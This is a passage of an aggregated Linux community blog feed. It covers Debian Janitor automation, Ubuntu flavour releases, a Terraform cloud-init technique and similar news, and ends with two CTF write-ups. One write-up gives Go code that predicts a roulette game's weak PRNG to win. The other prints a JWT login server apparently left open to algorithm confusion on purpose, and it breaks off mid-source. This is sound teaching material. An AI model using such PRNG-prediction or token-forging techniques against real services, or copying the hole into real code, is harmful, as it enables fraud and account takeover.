Packages without priority are processed with a scoring system that takes into account perceived value (based on e.g. popcon), cost (based on wall-time duration of previous builds) and likelihood of success (whether recent builds were successful, and how frequently the repositories involved change).

Webhooks for upstream repositories

At the moment there is no service in Debian (yet - perhaps this is something that vcswatch or a sibling service could also do?) that scans upstream repositories for changes.

However, if you maintain an upstream package, you can use a webhook to notify the janitor that commits have been made to your repository, and it will create a new package in fresh-snapshots. Webhooks from the following hosting site software are currently supported:

You can simply use the URL as the target for hooks. There is no need to specify a secret, and the hook can use either a JSON or a form-encoded payload.

The endpoint should tell you whether it understood a webhook request, and whether it took any action. It’s fine to submit webhooks for repositories that the janitor does not (yet) know about.


For GitHub, you can do so in the Webhooks section of the Settings tab. Fill the form as shown below and click on Add webhook:


On GitLab instances, you can find the Webhooks tab under the Settings menu for each repository (under the gear symbol). Fill the form in as shown below and click Add Webhook:


For Launchpad, go to the repository (for Git) web view and click Manage Webhooks. From there, you can add a new webhook; fill the form in as shown below and click Add Webhook:

on September 06, 2021 08:00 PM

September 05, 2021

Last week I was part of a meeting with the UK’s Competition and Markets Authority, the regulator, to talk about Apple devices and the browser choice (or lack of it) on them. They’re doing a big study into Apple’s conduct in relation to the distribution of apps on iOS and iPadOS devices in the UK, in particular, the terms and conditions governing app developers’ access to Apple’s App Store, and part of that involves looking at browsers on iOS, and part of that involves talking to people who work on the web. So myself and Bruce Lawson and another UK developer of iOS and web apps put together some thoughts and had a useful long meeting with the CMA on the topic.

They asked that we keep confidential the exact details of what was discussed and asked, which I think is reasonable, but I did put together a slide deck to summarise my thoughts which I presented to them, and you can certainly see that. It’s at and shows everything that I presented to the CMA along with my detailed notes on what it all means.

A slide from the presentation, showing a graph of how far behind Safari is and indicating that all other browsers on iOS are equally far behind, because they're all also Safari

Bruce had a similar slide deck, and you can read his slides on iOS’s browser monopoly and progressive web apps. Bruce has also summarised our other colleague’s presentation, which is what we led off with. The discussion that we then went into was really interesting; they asked some very sensible questions, and showed every sign of properly understanding the problem already and wanting to understand it better. This was good: honestly, I was a bit worried that we might be trying to explain the difference between a browser and a rendering engine to a bunch of retired colonel types who find technology to be baffling and perhaps a little unmanly, and this was emphatically not the case; I found the committee engaging and knowledgeable, and this is encouraging.

In the last few weeks we’ve seen quite a few different governments and regulatory authorities begin to take a stand against tech companies generally and Apple’s control over your devices more specifically. These are baby steps — video and music apps are now permitted to add a link to their own website, saints preserve us, after the Japan Fair Trade Commission’s investigation; developers are now allowed to send emails to their own users which mention payments, which is being hailed as “flexibility” although it doesn’t allow app devs to tell their users about other payment options in the app itself, and there are still court cases and regulatory investigations going on all around the world. Still, the tide may be changing here.

What I would like is that I can give users the best experience on the web, on the best mobile hardware. That best mobile hardware is Apple’s, but at the moment if I want to choose Apple hardware I have to choose a sub-par web experience. Nobody can fix this other than Apple, and there are a bunch of approaches that they could take — they could make Safari be a best-in-class experience for the web, or they could allow other people to collaborate on making the browser best-in-class, or they could stop blocking other browsers from their hardware. People have lots of opinions about which of these, or what else, could and should be done about this; I think pretty much everyone thinks that something should be done about it, though. Even if your goal is to slow the web down and to think that it shouldn’t compete with native apps, there’s no real reason why flexbox and grid and transforms should be worse in Safari, right? Anyway, go and read the talk for more detail on all that. And I’m interested in what you think. Do please hit me up on Twitter about this, or anything else; what do you think should be done, and how?

on September 05, 2021 11:05 PM

August 31, 2021

Full Circle Weekly News #225

Full Circle Magazine

GTK 4.4 graphical toolkit:

GNOME 41 Beta Available:

Release of the GNU Taler 0.8:

Linux kernel turns 30:

Release of QEMU Emulator 6.1:

SeaMonkey 2.53.9:

Free OpenShot Video Editor 2.6.0 Released:

The GNOME Project has launched an Application Web Directory:

Ubuntu 20.04.3 LTS Release with Graphics Stack and Linux Kernel Updates:

DogLinux Build Update:

Qt Creator 5.0 Released:

LibreELEC 10.0:

New releases of anonymous network I2P 1.5.0:

Delta Chat 1.22 messenger is available:


Full Circle Magazine
Host: @bardictriad,
Bumper: Canonical
Theme Music: From The Dust – Stardust

on August 31, 2021 06:06 PM

Returning to DebConf

Benjamin Mako Hill

I first started using Debian sometime in the mid 90s and started contributing as a developer and package maintainer more than two decades ago. My very first scholarly publication, collaborative work led by Martin Michlmayr that I did when I was still an undergrad at Hampshire College, was about quality and the reliance on individuals in Debian. To this day, many of my closest friends are people I first met through Debian. I met many of them at Debian's annual conference, DebConf.

Given my strong connections to Debian, I find it somewhat surprising that although all of my academic research has focused on peer production, free culture, and free software, I haven’t actually published any Debian related research since that first paper with Martin in 2003!

So it felt like coming full circle when, several days ago, I was able to sit in the virtual DebConf audience and watch two of my graduate student advisees—Kaylea Champion and Wm Salt Hale—present their research about Debian at DebConf21.

Salt presented his master's thesis work, which tried to understand the social dynamics behind organizational resilience among free software projects. Kaylea presented her work on a new technique she developed to identify at-risk software packages that are lower quality than we might hope given their popularity (you can read more about Kaylea's project in our blog post from earlier this year).

If you missed either presentation, check out the blog post my research collective put up or watch the videos below. If you want to hear about new work we’re doing—including work on Debian—you should follow our research group blog, and/or follow or engage with us in the Fediverse (, or on Twitter (@comdatasci).

And if you’re interested in joining us—perhaps to do more research on FLOSS and/or Debian and/or a graduate degree of your own?—please be in touch with me directly!

Wm Salt Hale’s presentation plus Q&A. (WebM available)
Kaylea Champion’s presentation plus Q&A. (WebM available)
on August 31, 2021 01:29 AM

August 29, 2021

Xubuntu 20.04, Focal Fossa

Xubuntu 20.04.3, our latest LTS release update.
Xubuntu Development Update August 2021

Xubuntu 20.04.3 was released on Thursday, August 26th. It's a maintenance release consisting primarily of bug fixes and security updates. You can find the full list of changes here. Special thanks to everybody that helped test this release! Download links are available on Some important updates include:

  • exo 0.12.11-1ubuntu1.20.04.1: Fixes resizing the xfce4-settings window smaller (LP: #1874954)
  • xfce4-weather-plugin 0.10.1 -> 0.10.2: Fixes weather lookups due to an expired API  (LP: #1918002)
  • firefox 85 -> 91
  • linux 5.8 -> 5.11
  • thunderbird 68 -> 78

Xubuntu 21.10, Impish Indri

Enabling the Super (Windows) Key

A popular request over the years has been to bind the Super key to show the applications menu. For technical reasons, we weren't able to implement this change using what's included in Xfce.

On the upstream bug, Andre Miranda recommended using xcape to work around this particular issue. We've adopted this solution for Xubuntu, and now the Super key shows the applications menu without breaking other Super key shortcuts! I've demoed the Super key functionality on Twitter:
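For the curious, the xcape approach maps a tap of the Super key onto an ordinary keyboard shortcut that the menu is already bound to; a minimal sketch of the idea (the exact shortcut shown is an assumption, not necessarily the binding Xubuntu ships):

```shell
# When Super_L is tapped on its own, emit Ctrl+Escape,
# which can then be bound to xfce4-popup-whiskermenu
xcape -e 'Super_L=Control_L|Escape'
```

Because xcape only fires when the key is tapped alone, combinations like Super+E keep working.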

Rhythmbox Alternative Toolbar Layout

Rhythmbox 3.4.4 in Xubuntu 21.10

Last month the Twitter community voted on whether to include the standard or the "Alternative Toolbar" layout for Rhythmbox in Xubuntu. With 89 votes and 82% of the vote in favor of the Alternative Toolbar layout, we're now shipping it in Xubuntu!

Slideshow Translations

The slideshow displayed while installing Xubuntu.

I did some cleanup on the Xubuntu installer slideshow this month, merging in a pull request, bulk updating translations, and getting everything synced over to Transifex. I was also granted push permissions to the upstream Ubiquity slideshow codebase, making it much easier to sync the Xubuntu updates back over. Going forward, we'll have a lot more control over the delivery of our translations. If you want to help contribute to our slideshow translations, please sign up on Transifex!

Package Updates

In August, the Xubuntu packageset saw updates to several Xfce components, MATE 1.26, and the Xubuntu default settings. Remember that you can keep up with Xubuntu's latest package updates by following Planet Bluesabre (RSS, Twitter).

Upcoming Dates

There are some key dates just around the corner in the Release Schedule. Now's the time to start testing if you haven't already!

We're getting close to the final release of 21.10 and then the beginning of our next LTS, 22.04. If you'd like to help out, check out the Get Involved section of the Xubuntu website. We need all sorts of help, so if you've got the time, we'd love to help you help us!

on August 29, 2021 07:59 PM

August 27, 2021

Full Circle Magazine #172

Full Circle Magazine

This month:
* Command & Conquer : LMMS
* How-To : Python, Eternal Terminal and Making A Network Print Server
* Graphics : Inkscape
* Everyday Ubuntu : Retrogaming Revised
* Micro This Micro That
* Review : Ubuntu Unity 21.04
* Ubuntu Games : Don’t Forget Me
plus: News, The Daily Waddle, Q&A, and more.

Get it while it’s hot!

on August 27, 2021 05:07 PM

The third point release update to Kubuntu 20.04 LTS (Focal Fossa) is out now. This contains all the bug-fixes added to 20.04 since its first release in April 2020. Users of 20.04 can run the normal update procedure to get these bug-fixes.

See the Ubuntu 20.04.3 Release Notes and the Kubuntu Release Notes.

Download all available released images.

on August 27, 2021 02:47 AM

August 26, 2021

Thanks to all the hard work from our contributors, we are pleased to announce that Lubuntu 20.04.3 LTS has been released! What is Lubuntu? Lubuntu is an official Ubuntu flavor which uses the Lightweight Qt Desktop Environment (LXQt). The project’s goal is to provide a lightweight yet functional Linux distribution based on a rock-solid Ubuntu […]
on August 26, 2021 02:52 PM

August 25, 2021

The Debian Janitor is an automated system that commits fixes for (minor) issues in Debian packages that can be fixed by software. It gradually started proposing merges in early December. The first set of changes sent out ran lintian-brush on sid packages maintained in Git. This post is part of a series about the progress of the Janitor.

Linux distributions like Debian fulfill an important function in the FOSS ecosystem - they are system integrators that take existing free and open source software projects and adapt them where necessary to work well together. They also make it possible for users to install more software in an easy and consistent way and with some degree of quality control and review.

One of the consequences of this model is that the distribution package often lags behind upstream releases. This is especially true for distributions that have tighter integration and standardization (such as Debian), and often new upstream code is only imported irregularly because it is a manual process - both updating the package itself and making sure that it still works well with the rest of the system.

The process of importing a new upstream used to be (well, back when I started working on Debian packages) fairly manual and something like this:

  • Go to the upstream’s homepage, find the tarball and signature and verify the tarball
  • Make modifications so the tarball matches Debian’s format
  • Diff the original and new upstream tarballs and figure out whether changes are reasonable and which require packaging changes
  • Update the packaging, changelog, build and manually test the package
  • Upload
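The manual steps above map roughly onto the classic devscripts workflow; a sketch with placeholder package and version names:

```shell
# Find, download, and verify the latest upstream tarball per debian/watch
uscan --download --verbose

# Merge the new upstream tarball into the packaging tree
uupdate ../example_1.2.3.orig.tar.gz

# Record the new version, then build and test the package
dch -v 1.2.3-1 'New upstream release.'
dpkg-buildpackage -us -uc
```

Each of these steps still requires human review; automating them is what the rest of this post is about.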

Ecosystem Improvements

However, there have been developments over the last decade that make it easier to import new upstream releases into Debian packages.

Uscan and debian QA watch

Uscan and debian/watch have been around for a while and make it possible to find upstream tarballs.

A debian watch file usually looks something like this:


The QA watch service regularly polls all watch locations in the archive and makes the information available, so it’s possible to know which packages have changed without downloading each one of them.


Git is fairly ubiquitous nowadays, and most upstream projects and packages in Debian use it. There are still exceptions that do not use any version control system or that use a different control system, but they are becoming increasingly rare. [1]


DEP-12 specifies a file format with metadata about the upstream project that a package was based on. Particularly relevant for our case is that it has fields for the location of the upstream version control repository.

debian/upstream/metadata files look something like this:
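A hypothetical example (project names are placeholders):

```yaml
---
Repository: https://github.com/example/example.git
Repository-Browse: https://github.com/example/example
Bug-Database: https://github.com/example/example/issues
```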


While DEP-12 is still a draft, it has already been widely adopted - there are about 10000 packages in Debian that ship a debian/upstream/metadata file with Repository information.


The Autopkgtest standard and associated tooling provide a way to run a defined set of tests against an installed package. This makes it possible to verify that a package is working correctly as part of the system as a whole. regularly runs these tests against Debian packages to detect regressions.
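As an illustration, a minimal debian/tests/control declaring a single test (the test name is a placeholder, and debian/tests/smoke would be an executable script exercising the installed package):

```
Tests: smoke
Depends: @
```

Here `@` expands to all binary packages built from the source package, so the test runs against the package as installed.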

Vcs-Git headers

The Vcs-Git headers in debian/control are the equivalent of the Repository field in debian/upstream/metadata, but for the packaging repositories (as opposed to the upstream ones).
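In debian/control, these headers look something like the following (a hypothetical Salsa project):

```
Vcs-Git: https://salsa.debian.org/example-team/example.git
Vcs-Browser: https://salsa.debian.org/example-team/example
```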

They’ve been around for a while and are widely adopted, as can be seen from zack’s stats:

The vcswatch service, which regularly polls packaging repositories to see whether they have changed, makes it a lot easier to consume this information in a usable way.

Debhelper adoption

Over the last couple of years, Debian has slowly been converging on a single build tool - debhelper’s dh interface.

Being able to rely on a single build tool makes it easier to write code to update packaging when upstream changes require it.

Debhelper DWIM

Debhelper (and its helpers) increasingly can figure out how to do the Right Thing in many cases without being explicitly configured. This makes packaging less effort, but also means that it’s less likely that importing a new upstream version will require updates to the packaging.

With all of these improvements in place, it actually becomes feasible in a lot of situations to update a Debian package to a new upstream version automatically. Of course, this requires that all of this information is available, so it won’t work for all packages. In some cases, the packaging for the older upstream version might not apply to the newer upstream version.

The Janitor has attempted to import a new upstream Git snapshot and a new upstream release for every package in the archive where a debian/watch file or debian/upstream/metadata file are present.

These are the steps it uses:

  • Find new upstream version
    • If release, use debian/watch - or maybe tagged in upstream repository
    • If snapshot, use debian/upstream/metadata’s Repository field
    • If neither is available, use guess-upstream-metadata from upstream-ontologist to guess the upstream Repository
  • Merge upstream version into packaging repository, possibly importing tarballs using pristine-tar
  • Update the changelog file to mention the new upstream version
  • Run some checks to ensure there are no unintentional changes, e.g.:
    • Scan diff between old and new for surprising license changes
      • Today, abort if there are any - in the future, maybe update debian/copyright
    • Check for obvious compatibility breaks - e.g. sonames changing
  • Attempt to update the packaging to reflect upstream changes
    • Refresh patches
  • Attempt to build the package with deb-fix-build, to deal with any missing dependencies
  • Run the autopkgtests with deb-fix-build to deal with missing dependencies, and abort if any tests fail


When run over all packages in unstable (sid), this process works for a surprising number of them.

Fresh Releases

For fresh-releases (aka imports of upstream releases), processing all packages maintained in Git for which QA watch reports new releases (about 11,000):

That means about 2300 packages updated, and about 4000 unchanged.

Fresh Snapshots

For fresh-snapshots (aka imports of latest Git commit from upstream), processing all packages maintained in Git (about 26,000):

Or 5100 packages updated and 2100 for which there was nothing to do, i.e. no upstream commits since the last Debian upload.

As can be seen, this works for a surprising fraction of packages. It’s possible to get the numbers up even higher, by both improving the tooling, the autopkgtests and the metadata that is provided by packages.

Using these packages

All the packages that have been built can be accessed from the Janitor APT repository. More information can be found at, but in short - run:

echo deb "[arch=amd64 signed-by=/usr/share/keyrings/debian-janitor-archive-keyring.gpg]" \ fresh-snapshots main | sudo tee /etc/apt/sources.list.d/fresh-snapshots.list
echo deb "[arch=amd64 signed-by=/usr/share/keyrings/debian-janitor-archive-keyring.gpg]" \ fresh-releases main | sudo tee /etc/apt/sources.list.d/fresh-releases.list
sudo curl -o /usr/share/keyrings/debian-janitor-archive-keyring.gpg
apt update

And then you can install packages from the fresh-snapshots (upstream git snapshots) or fresh-releases suites on a case-by-case basis by running something like:

apt install -t fresh-snapshots r-cran-roxygen2

Most packages are updated based on information provided by vcswatch and qa watch, but it’s also possible for upstream repositories to call a web hook to trigger a refresh of a package.

These packages were built against unstable, but should in almost all cases also work for testing.


Of course, since these packages are built automatically without human supervision it’s likely that some of them will have bugs in them that would otherwise have been caught by the maintainer.

[1] I'm not saying that a monoculture is great here, but it does help distributions.
on August 25, 2021 06:00 PM

August 22, 2021

Late August Update

Stephen Michael Kellat

You know you’ve been busy when it has been almost an entire month since you’ve made a blog post. Reducing things to bullet points (give or take) may prove best. In no particular order:

  • I learned about edbrowse from the latest episode of the Ubuntu Podcast. If I ever wind up using an actual teletype for a terminal that might be quite handy.

  • Work continues on a provisional effort to rig up something for podcasting using a static site generator. Someone already started the work in Jekyll and put it on GitHub. Now the name of the game is adapting what they did to suit my purposes.

  • The testing manifest for Impish Indri shows only vanilla Ubuntu desktop shipping an image for Raspberry Pi. Considering my working “desktop” at the moment is a Raspberry Pi 4, any testing efforts on my part may wind up limited as I do not normally test vanilla Ubuntu desktop.

  • There are initial concepts for the fourth story roughly developed. I’m not quite sure where they might lead. Further development is required.

  • Campaigning? What campaigning? That’s not quite in progress in any traditional sense. The delta variant of SARS-CoV-2 is forcing non-traditional directions to all that, too.

  • Something akin to a DECwriter or TI Silent 700 mated to a Raspberry Pi would allow for some computing access if I wind up getting significant eye strain from seeing too many computer screens…again. It feels weird to even be thinking about such things.

  • Things can improve no matter how bleak the world around us looks. It was fairly shocking Saturday to see how desensitized people had become to disasters. A nasty hurricane was bearing down on New York City and New England yet it was being ignored by the main news media outlets.

  • I am spending quite a bit of time using to find streams to listen to. More people should make use of it.

Tags: Life

on August 22, 2021 05:41 PM

August 19, 2021

Terraform is a powerful tool. However, it has some limitations: since it uses AWS APIs, it doesn’t have a native way to check whether an EC2 instance has finished running cloud-init before marking it as ready. A possible workaround is asking Terraform to SSH into the instance and wait until it can establish a connection before marking the instance as ready.


Terraform logo, courtesy of HashiCorp.

I find using SSH in Terraform quite problematic: you need to distribute a private SSH key to anybody who will launch the Terraform script, including your CI/CD system. This is a no-go for me: it adds the complexity of managing SSH keys, including their rotation. There is a huge issue on the Terraform repo on GitHub about this functionality, and the most voted solution is indeed connecting via SSH to run a check:

provisioner "remote-exec" {
  inline = [
    "cloud-init status --wait"
  ]
}

AWS Systems Manager Run Command

The idea of using cloud-init status --wait is indeed quite good. The only problem is how to ask Terraform to run such a command. Luckily for us, AWS has a service, AWS SSM Run Command, that allows us to run commands on an EC2 instance through AWS APIs! This way, our CI/CD system needs only an appropriate IAM role and a way to invoke AWS APIs. I use the AWS CLI in the examples below, but you can adapt them to any language you prefer.


If you don’t know AWS SSM yet, go and take a look at the introductory guide. There are some prerequisites to using AWS SSM Run Command: the AWS SSM Agent must be installed on the instance. It is preinstalled on Amazon Linux 2 and on Ubuntu 16.04, 18.04, and 20.04. For any other OS, we need to install it manually: it is supported on Linux, macOS, and Windows.

The user or the role that executes the Terraform code needs to be able to create, update, and read AWS SSM Documents, and to run SSM commands. A possible policy could look like this (the action list here is deliberately broad, since the exact actions are elided; tighten it as noted below):

{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Sid": "Stmt1629387563127",
      "Action": [
        "ssm:*"
      ],
      "Effect": "Allow",
      "Resource": "*"
    }
  ]
}
If we already know the names of the documents, or the instances where we want to run the commands, it is better to lock down the policy by specifying the resources, according to the principle of least privilege.

Last but not least, we need to have the AWS CLI installed on the system that will execute Terraform.

The Terraform code

After having set up the prerequisites as above, we need two different Terraform resources. The first will create the AWS SSM Document with the command we want to execute on the instance. The second will execute that command while provisioning the EC2 instance.

The AWS SSM Document code will look like this:

resource "aws_ssm_document" "cloud_init_wait" {
  name            = "cloud-init-wait"
  document_type   = "Command"
  document_format = "YAML"
  content         = <<-DOC
    schemaVersion: '2.2'
    description: Wait for cloud init to finish
    mainSteps:
    - action: aws:runShellScript
      name: StopOnLinux
      precondition:
        StringEquals:
        - platformType
        - Linux
      inputs:
        runCommand:
        - cloud-init status --wait
    DOC
}

We can refer to this document from within our EC2 instance resource, with a local provisioner:

resource "aws_instance" "example" {
  ami           = "my-ami"
  instance_type = "t3.micro"

  provisioner "local-exec" {
    interpreter = ["/bin/bash", "-c"]

    command = <<-EOF
    set -Ee -o pipefail
    export AWS_DEFAULT_REGION=${}

    command_id=$(aws ssm send-command --document-name ${aws_ssm_document.cloud_init_wait.arn} --instance-ids ${} --output text --query "Command.CommandId")
    if ! aws ssm wait command-executed --command-id $command_id --instance-id ${}; then
      echo "Failed to start services on instance ${}!";
      echo "stdout:";
      aws ssm get-command-invocation --command-id $command_id --instance-id ${} --query StandardOutputContent;
      echo "stderr:";
      aws ssm get-command-invocation --command-id $command_id --instance-id ${} --query StandardErrorContent;
      exit 1;
    fi
    echo "Services started successfully on the new instance with id ${}!"
    EOF
  }
}


From now on, Terraform will wait for cloud-init to complete before marking the instance ready.
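If you would rather call the API from Python than shell out to the AWS CLI, the same flow can be sketched with boto3. This is a hedged sketch: the helper name `wait_for_cloud_init` is mine, and `ssm` is assumed to be a `boto3.client("ssm")` (or anything with the same interface).

```python
def wait_for_cloud_init(ssm, instance_id, document_name):
    """Run the SSM document on the instance and wait for it to finish.

    `ssm` is a boto3 SSM client (or any object with the same interface).
    Hypothetical helper, mirroring the CLI flow in the provisioner above.
    """
    # Equivalent of `aws ssm send-command ...`
    resp = ssm.send_command(
        DocumentName=document_name,
        InstanceIds=[instance_id],
    )
    command_id = resp["Command"]["CommandId"]
    # Equivalent of `aws ssm wait command-executed ...`: the
    # 'command_executed' waiter polls until the command reaches a
    # terminal state, raising if it fails.
    waiter = ssm.get_waiter("command_executed")
    waiter.wait(CommandId=command_id, InstanceId=instance_id)
    return command_id
```

Usage would be something like `wait_for_cloud_init(boto3.client("ssm"), instance_id, "cloud-init-wait")` once the instance exists.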


AWS Session Manager, AWS Run Command, and the other tools in the AWS Systems Manager family are quite powerful, and in my experience they are not widely used. I find them extremely useful: for example, they also allow connecting via SSH to the instances without having any port open, including port 22! Basically, they allow managing and running commands inside instances purely through AWS APIs, with a lot of benefits, as AWS explains:

Session Manager provides secure and auditable instance management without the need to open inbound ports, maintain bastion hosts, or manage SSH keys. Session Manager also allows you to comply with corporate policies that require controlled access to instances, strict security practices, and fully auditable logs with instance access details, while still providing end users with simple one-click cross-platform access to your managed instances.

Do you have any questions, feedback, criticism, or requests for support? Leave a comment below, reach me on Twitter (@rpadovani93) or drop me an email at


on August 19, 2021 06:30 PM

August 17, 2021

Adding comments to the blog

Riccardo Padovani

After years of blogging, I’ve finally chosen to add a comment system, including reactions, to this blog. I’ve done so to make it easier to engage with the four readers of my blabbering: of course, it took some time to choose the right comment provider, but finally, here we are!


A picture I took at the CCC 2015 - and the moderation policy for comments!

Long ago, I chose not to put any client-side analytics on this website: while the nerd in me loves graphs and numbers, I don’t think they are worth the loss of privacy and performance for the readers. However, I am curious to have feedback on the content I write, whether some of it is useful, and how I can improve. In all these years, I’ve received various emails about some posts, and they are heart-warming. With comments, I hope to reduce the friction of communicating with me and to have some meaningful interaction with you.


Looking for a comment system, I had three requirements in mind: being privacy-friendly, being performant, and being managed by somebody else.

A lot of comment systems are “free”, because they live on advertisements, or on tracking user activities, and more often a combination of both. However, since I want comments on my website, I find it dishonest that you, the user, have to pay the price for it. So, I was looking for something that doesn’t track users, and bases its business on dear old money. My website, my wish, my wallet.

I find performance important, and unfortunately quite undervalued on the bloated Internet. I like having just some HTML, some CSS, and the minimum of JavaScript necessary, so whoever stumbles on these pages doesn’t waste CPU and time waiting for rendering. This being a static website, there is no server side, so I cannot host comments there. I had to find a really light JavaScript-based comment system.

Given these two prerequisites, you would say the answer is obvious: find a comment system that you can self-host! And you would be perfectly right. However, since I already spend 8 hours a day keeping stuff online, I really don’t want to have to care about performance and uptime in my free time; I definitely prefer going for a beer with a friend.

After some shopping around, I’ve chosen to go with Hyvor Talk, since it checks all three requirements above. I’ve read nice things about it, so let’s see how it goes! And if you don’t see comments at the end of the page, a privacy plugin for your browser is probably blocking them; it’s up to you whether to whitelist my website, or to communicate with me in other ways ;-)

A nice plus of Hyvor is that it also supports reactions, so if you are in a hurry but still want to leave quick feedback on the post, you can simply click a button. Fancy, isn’t it?


The Internet can be ugly sometimes, and this is why I will keep a strict eye on the comments, and I will probably adjust moderation settings in the future, based on how things evolve. Maybe no-one will comment, and then there will be no need for any strict moderation! The only rule I ask you to abide by, and which I’ve set as the moderation policy, is: “Be excellent to each other”. I read it at the CCC Camp 2015, and it has stuck with me: like every short sentence, it cannot capture all the nuances of human interaction, but I think it is a very solid starting point. If you have any concern or feedback you prefer not to express in public, feel free to reach me through email. Otherwise, I hope to see you all in the comment section ;-)

Questions, comments, feedback, criticism, suggestions on how to improve my English? Reach me on Twitter (@rpadovani93) or drop me an email at Or, from today, leave a comment below!


on August 17, 2021 10:00 PM

August 12, 2021

0x0G is Google’s annual “Hacker Summer Camp” event. Normally this would be in Las Vegas during the week of DEF CON and Black Hat, but well, pandemic rules apply. I’m one of the organizers for the CTF we run during the event, and I thought I’d write up solutions to some of my challenges here.

gRoulette is a simplified Roulette game online. Win enough and you’ll get the flag. The source code is provided, and the entire thing is run over a WebSocket connection to the server.


Examining the websocket flow, we see a series of messages:


Taking a look at the source code, we see that the rounds are handled by a function in roulette.go:

func (g *RouletteGame) PlayRound() {

	// Finish the round
	finishedRound := g.CurrentRound
	space := g.NextSpace()
	g.CurrentRound = g.prng.Next()
	res := &RoundResult{
		RoundID:     finishedRound,
		NextRoundID: g.CurrentRound,
		Space:       space,
	}
	// ...
}
This tells us the space where the “ball” lands is computed using a NextSpace function:

func (g *RouletteGame) NextSpace() SpaceID {
	num := g.prng.BoundedNext(37)
	if num == 37 {
		return "00" // Special case double 0.
	}
	return SpaceID(fmt.Sprintf("%d", num))
}

Of interest is that both the CurrentRound and Space values are derived from the same PRNG instance. Depending on the security of the RNG, it may be possible to predict the next space(s) based on the current state of the RNG. The source of the PRNG is provided as well:

package main

import (
	"crypto/rand"
	"encoding/binary"
)

const (
	PrngModulus    uint32 = 0x7FFFFFFF
	PrngMultiplier uint32 = 48271
)

type PRNG uint32

func NewPRNG(seed uint32) *PRNG {
	if seed == 0 {
		if err := binary.Read(rand.Reader, binary.BigEndian, &seed); err != nil {
			panic(err)
		}
	}
	p := PRNG(seed)
	return &p
}

// Algorithm certified by Nanopolis Gaming Commission
func (p *PRNG) Next() uint32 {
	tmp := uint64(*p) * uint64(PrngMultiplier)
	tmp %= uint64(PrngModulus)
	*p = PRNG(tmp)
	return uint32(tmp)
}

func makeBitmask(v uint32) uint32 {
	rv := uint32(0)
	for v != 0 {
		rv = rv << 1
		rv |= 1
		v = v >> 1
	}
	return rv
}

func (p *PRNG) BoundedNext(max uint32) uint32 {
	mask := makeBitmask(max)
	for {
		tmp := p.Next() & mask
		if tmp <= max {
			return tmp
		}
	}
}
The Next method is responsible for advancing the PRNG. It multiplies by a constant, then takes a modulus. Searching for the constants reveals that this is an implementation of a well-known Linear Congruential Generator. This implementation is similar to the MINSTD RNG, and exposes the entire state in a call to Next. Notably the RoundID is entirely an output of the PRNG, so every subsequent value can be known. Consequently, we can call the PRNG with our own inputs to find out what the next spins will be.

package main

import (
        "fmt"
        "os"
        "strconv"
)

func main() {
        seed64, err := strconv.ParseInt(os.Args[1], 10, 32)
        if err != nil {
                panic(err)
        }
        round := uint32(seed64)
        p := NewPRNG(round)
        for i := 0; i < 8; i++ {
                roll := p.BoundedNext(37)
                v := fmt.Sprintf("%d", roll)
                if roll == 37 {
                        v = "00"
                }
                fmt.Printf("%d: %s\n", round, v)
                round = p.Next()
        }
}
When we run it, this will print out the next 8 rolls:

% go run . 520308631
520308631: 8
439000315: 0
2059893773: 33
1060020398: 5
1254119902: 32
1689320946: 2
918638365: 28
114073520: 20

Just max bet each one and you’ll have the requisite money in no time. :) (Feel free to automate it. I just did it manually.)
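The same prediction logic also ports to a few lines of Python, which makes the attack easy to verify against the table above (a direct transcription of the Go PRNG; the function names are mine):

```python
MODULUS = 0x7FFFFFFF      # 2**31 - 1
MULTIPLIER = 48271        # MINSTD-style multiplier

def lcg_next(state):
    # One PRNG step: state' = state * 48271 mod (2**31 - 1)
    return (state * MULTIPLIER) % MODULUS

def predict_rolls(round_id, count=8):
    # The RoundID leaks the full PRNG state, so replaying the generator
    # from it yields every upcoming space.
    rolls, state = [], round_id
    for _ in range(count):
        while True:                 # mirrors BoundedNext(37)
            state = lcg_next(state)
            roll = state & 0x3F     # 6-bit mask, as makeBitmask(37) builds
            if roll <= 37:
                break
        rolls.append("00" if roll == 37 else str(roll))
        state = lcg_next(state)     # this value is the NextRoundID
    return rolls
```

`predict_rolls(520308631)` reproduces the eight spins printed by the Go program above.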

FLAG: 0x0G{maybe_vegas_next_year_for_real!}

gRoulette Solved

on August 12, 2021 07:00 AM

0x0G is Google’s annual “Hacker Summer Camp” event. Normally this would be in Las Vegas during the week of DEF CON and Black Hat, but well, pandemic rules apply. I’m one of the organizers for the CTF we run during the event, and I thought I’d write up solutions to some of my challenges here.

The first such challenge is authme, a web/crypto challenge. The description just wants to know if you can auth as admin and directs you to a website. On the website, we find a link to the source code, to an RSA public key, and a login form.

Attempting to login, we are told to try “test/test” for demo purposes. Using “test/test”, we are logged in, but it just says “Welcome, test” – not the exciting output we were hoping for. Let’s examine the source:

import flask
import jwt
import collections
import logging
import hashlib

app = flask.Flask(__name__)

KeyType = collections.namedtuple(
        'KeyType',
        ('algo', 'pubkey', 'key'),
        defaults=(None, None))

COOKIE_NAME = 'authme_session'

KEYS = {
        'k1': KeyType('HS256', key=...),              # HMAC secret elided
        'k2': KeyType('RS256', pubkey=..., key=...),  # RSA key pair elided
}

FLAG = open('flag.txt', 'r').read()

def jwt_encode(payload, kid=DEFAULT_KEY):
    key = KEYS[kid]
    return jwt.encode(
            payload, key.key, algorithm=key.algo,
            headers={'kid': kid})

def jwt_decode(data):
    header = jwt.get_unverified_header(data)
    kid = header.get('kid')
    if kid not in KEYS:
        raise jwt.InvalidKeyError("Unknown key!")
    return jwt.decode(
            data,
            key=(KEYS[kid].pubkey or KEYS[kid].key),
            algorithms=['HS256', 'RS256'])

def get_user_info():
    sess = flask.request.cookies.get(COOKIE_NAME)
    if sess:
        return jwt_decode(sess)
    return None

@app.route("/")
def home():
    try:
        user = get_user_info()
    except Exception as ex:'JWT error: %s', ex)
        return flask.render_template(
                ..., error="Error loading session!")
    return flask.render_template(...)  # template args elided; the flag is passed here too
@app.route("/login", methods=['POST'])
def login():
    u = flask.request.form.get('username')
    p = flask.request.form.get('password')
    if u == "test" and p == "test":
        # do login
        resp = flask.redirect("/")
        resp.set_cookie(COOKIE_NAME, jwt_encode({"username": u}))
        return resp
    # render login error page
    return flask.render_template(
            ...,
            error="Invalid username/password.  Try test/test for testing!")

def get_pubkey(kid):
    if kid in KEYS:
        key = KEYS[kid].pubkey
        if key is not None:
            resp = flask.make_response(key)
            resp.headers['Content-type'] = 'text/plain'
            return resp

def get_authme():
    contents = open(__file__).read()
    resp = flask.make_response(contents)
    resp.headers['Content-type'] = 'text/plain'
    return resp

def prepare_key(unused_self, k):
    if k is None:
        raise ValueError('Missing key!')
    if len(k) < 32:
        return jwt.utils.force_bytes(hashlib.sha256(k).hexdigest())
